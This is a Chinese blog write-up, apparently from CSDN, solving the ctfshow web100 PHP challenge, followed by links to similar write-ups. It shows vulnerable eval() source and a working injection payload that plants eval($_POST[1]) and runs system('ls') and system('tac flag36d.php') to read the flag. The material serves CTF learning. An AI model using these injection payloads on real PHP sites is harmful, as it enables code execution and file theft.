CTFSHOW web入门 web100 wp

已于 2022-06-01 22:43:22 修改
阅读量1.3k 收藏
点赞数 1
文章标签: php 开发语言 安全
于 2022-05-22 21:46:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wei_xiao_zan/article/details/124917123
版权

终于做到100题了!!!

咱就是说先看代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-21 22:10:28
# @link: https://ctfer.com

*/

highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
    
}


?>

首先v0这里赋值是大于逻辑运算的,所以只要v1是数字,v2v3是啥都行

第一个判断里v2不能有分号(;)

第二个判断里v3必须有分号(;)

最后的eval里面有括号直接闭合了,直接执行的话不好构造函数,我们直接在v2里面把后面的php代码直接过滤掉

构造

?v1=1&v2=eval($_POST[1])?>%23&v3=;   #这里用%23不直接用#是因为在url里直接用#会把后面的东西直接注释掉,用%23就可以吧注释符写入php里面 
1=system('ls');
1=system('tac flag36d.php');

md,居然啥都没没有

 但是咱在ctfshow.php里面看到这一段

 听百度大佬说0x2d-

ctfshow{788286a0-1ee9-4756-ac10-8c82ff24fc45}

aweiliyoyo
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow php特性 web100
Kradress的博客
12-14 784
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-21 22:10:28 # @link: https://ctfer.com */ highlight_file(__FILE__); include("ctfshow.php"); //fl
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow-web100(php特性)
m0_62094846的博客
01-14 1405
运算符优先级:&& > || > = > and > or is_numeric() 函数用于检测变量是否为数字或数字字符串。 是数字和数字字符串则返回 TRUE,否则返回 FALSE <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 20
网络安全最全CTFShow-Web篇详细wp(持续更新中ing)_ctfshow web wp(1),2024年最新成功收获美团、小米网络安全offer
最新发布
2401_84252743的博客
05-14 294
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。又是这个熟悉的框 老样子尝试万能密码 发现报错!因篇幅有限,仅展示部分资料。
CTFSHOW WEB 1-100
weixin_54558860的博客
11-20 3321
ctfshow web 1-100
ctfshow--web入门(web89-100)
qing_chuan_的博客
06-03 373
else {} }highlight_file()函数:将文本信息高亮显示,识别里面的关键字,然后加入css的一个样式,混合起来进行输出要传入一个u弱类型比较与flag.php,要绕过,可以在前面加入一些,文件路径(var/www/html),绝对路径(./)playload :?u = / var / www / html / flag . php或者?
ctfshow之web入门-php特性89-100
weixin_47726676的博客
04-28 622
web89 if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } 不能是数字但又必须是数字 在intval()函数中, 空的 array 返回 0,非空的 array 返回 1。 ?num[] web90 if(isset($_GET['num'])){ $num = $_GET['num']; if($num==="
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
实验吧WEB题目WP
08-10
这是自己做的一个实验吧的十七到题目的WP,其中也有别人的WP
wpWeb服务编程案例
04-03
在Windows Phone(简称WP)平台上,开发者可以利用Web服务编程技术来创建强大的应用程序,与远程服务器进行数据交换,实现丰富的功能。本案例旨在探讨如何在Windows Phone设备上开发Web服务应用,通过集成Web服务,...
CtfHub-wpweb
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
CTFshow web(php特性97-100)
csjjjd的博客
02-03 1359
0x36d(877)这里是从36循环到877,每次i都加一,也就是说我从1~36直接生成一个随机数,然后1~37之间生成一个随机数,1~38............直到1~876,有没有发现一个事实,我每次的范围都包含了一个数字的,那就是1。接下来因为我把1传进去了,访问1.php页面,然后直接1=system("ls");所以越是前面的数据越是容易出现数据,出现覆盖对吧。有意思的是,这里的数组会对元素进行一个覆盖,这个位置产生了数据,但是第二次随机数又在。把格式包裹,然后0x2d换成-就好了。
CTFshow web入门web100-php12
weixin_74336671的博客
11-23 99
is_numeric是用于检测变量是否为数字或数字字符串,后面有 eval 函数,明示需要进行命令执行 v3需要有分号,v2不能有分号,这样的话v0就 = $v1 and FALSE and FALSE,但是php的运算具有优先级,如$a = true and false;,因为等号大于and,所以这里赋值为$a = True。可以把中间的(‘ctfshow’)注释掉,办法有很多种get_defined_vars()查看所有变量。,然后和后面的进行逻辑运算,并不会修改。and 的优先级是比等号要低的;
CTFSHOW-web
Makabakahaha的博客
07-01 703
phps文件类型主要由php组与php源关联。通常,php文件将由web服务器和php可执行文件解释,您将永远看不到php文件背后的代码。如果将文件扩展名设为.phps,配置正确的服务器将输出源代码的彩色格式版本,而不是通常生成的HTML。并非所有服务器都是这样配置的。也就是说,通过phps可以看到php代码未被解析的源代码所以拿到flagindex.phps是由于非正常关闭而产生的一个隐藏文件。
ctfshow-Web 解题记录1
weicanh的博客
04-19 4599
ctfshow-Web 解题记录1
《CTFshow-Web入门》10. Web 91~110
学习学习学习......
10-01 8018
PHP 特性之 preg_match(),换行解析漏洞、intval(),== 与 === 的区别、md5()、in_array()、三元运算、赋值运算【=】优先级、ReflectionClass($class) 建立反射类、is_numeric() 特性,call_user_func() 与 hex2bin() 利用,PHP 伪协议、sha1()、变量覆盖、parse_str() 利用、ereg() 截断漏洞、__toString() 与类触发、FilesystemIterator 类,getcwd()。
29c3ctf web100 regexdb writeup
请善待每一个被你欺负过的管理员 >_<
12-30 855
原文让我发在了blue-lotus队伍的站点里面了: 29c3ctf web100 regexdb writeup 不过这里也做一个留念吧~~~ Problem Link: regexdb **Description** Ever played Googlewhack? Well, this is a bit [easier][2] and gives you
ctfshow web97-100 php特性
qq_52671379的博客
03-28 535
ctfshow web97-php特性
ctfshow学习记录-web入门php特性99-108)
龟速更新的九某人
07-18 859
ctfshow学习记录-web入门php特性web99-108)
ctfshow web 电子取证
08-21
根据提供的引用内容,我了解到在ctfshow web电子取证中,分别得到了三个flag。的flag是ctfshow{e6ad8304cdb562971999b476d8922219},的flag是ctfshow{af5b5e411813eafd8dc2311df30b394e},的flag是ctfshow{5526710eb3ed7b4742232d6d6f9ee3a9}。这些flag可能是通过对Web上的电子证据进行分析和取证获得的。具体的取证过程和相关技术可能需要更多的背景信息才能进行详细的讨论。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [ctfshow终极考核wp](https://blog.csdn.net/weixin_46270220/article/details/122543062)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值